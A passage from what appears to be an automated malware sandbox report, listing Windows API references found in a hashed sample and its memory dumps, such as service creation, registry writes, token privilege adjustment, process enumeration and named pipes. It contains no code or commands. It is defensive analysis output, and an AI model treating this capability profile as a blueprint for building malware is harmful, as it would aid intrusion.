\"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"Process32First\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LockResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LoadLibraryExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"lstrcpyA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"VirtualQuery\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateEventA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MapViewOfFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateFileMappingA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WinExec\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetVersion\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DeviceIoControl\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"lstrcpynA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetDriveTypeA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"RemoveDirectoryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetNamedPipeHandleState\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FlushViewOfFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"TerminateThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetExitCodeThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"TransactNamedPipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GlobalFree\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetLocalTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreatePipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetLogicalDrives\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ConnectNamedPipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"Thread32Next\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DisconnectNamedPipe\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateNamedPipeA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenThread\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"PostThreadMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetThreadDesktop\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenWindowStationA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenDesktopA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetProcessWindowStation\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenServiceA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateServiceA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"StartServiceA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ControlService\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateProcessAsUserA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHGetSpecialFolderPathA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CompareStringA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteFileW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DosDateTimeToFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ExpandEnvironmentStringsA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FileTimeToDosDateTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindNextFileA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindNextFileW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FormatMessageA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetDateFormatA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetFullPathNameA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetNumberFormatA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTimeFormatA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LocalFileTimeToFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MoveFileA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MoveFileExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetCurrentDirectoryA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetEndOfFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileSecurityA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileSecurityW\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteObject\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CoCreateInstance\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OleInitialize\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"OleUninitialize\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHBrowseForFolderA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHFileOperationA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHGetFileInfoA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHGetMalloc\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHGetSpecialFolderLocation\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"SHGetPathFromIDListA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API (Indicator: \"CharToOemBuffA\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 